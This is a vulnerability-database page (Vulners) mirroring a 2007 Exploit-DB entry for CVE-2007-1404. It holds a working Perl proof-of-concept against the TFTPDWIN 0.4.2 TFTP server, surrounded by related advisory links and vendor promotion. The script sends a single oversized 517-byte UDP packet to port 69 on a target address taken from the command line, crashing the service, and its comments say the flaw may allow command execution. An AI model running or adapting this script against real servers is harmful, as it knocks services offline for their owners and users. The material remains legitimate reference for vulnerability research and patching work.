Lucene search
+L

ProSysInfo TFTP Server TFTPDWIN 0.4.2 - 'UDP' Denial of Service

🗓️ 08 Mar 2007 00:00:00Reported by Umesh WanveType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 29 Views

ProSysInfo TFTP Server TFTPDWIN 0.4.2 UDP Denial of Servic

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2007-1404
18 Aug 200900:00
circl
cve
CVE
CVE-2007-1404
10 Mar 200722:00
cve
cvelist
Cvelist
CVE-2007-1404
10 Mar 200722:00
cvelist
exploitdb
Exploit DB
ProSysInfo TFTP Server TFTPDWIN 0.4.2 - Remote Buffer Overflow (2)
18 Aug 200900:00
exploitdb
nvd
NVD
CVE-2007-1404
10 Mar 200722:19
nvd
prion
Prion
Sql injection
10 Mar 200722:19
prion
securityvulns
securityvulns
TFTPDWIN TFTP server buffer overflow
21 Sep 200600:00
securityvulns
#!/usr/bin/perl
#
#                            TFTPDWIN Server UDP DOS 0.4.2 POC
#			            written By : Umesh Wanve ([email protected])
#
#-------------------------------------------------------------------------------

# TFTPDWIN Server is a Freeware TFTP server for Windows 9x/NT/XP.
# (http://www.tftpserver.prosysinfo.com.pl)
# A vulnerability has been identified in TFTP Server TFTPDWIN Server v0.4.2, which
# could be exploited by remote or local attackers to execute arbitrary commands
# or cause a denial of service. This flaw is when attacker sends UDP packet of length more than 516 bytes

#

#----------------------------Start of Code-------------------------------------



use IO::Socket;
use strict;

my($socket) = "";

if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],

PeerPort => "69",

Proto    => "UDP"))
{

                 print $socket "A" x 517;
                 sleep(1);


                 close($socket);
}
else
{
                 print "Cannot connect to $ARGV[0]:69\n";
}

# milw0rm.com [2007-03-08]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation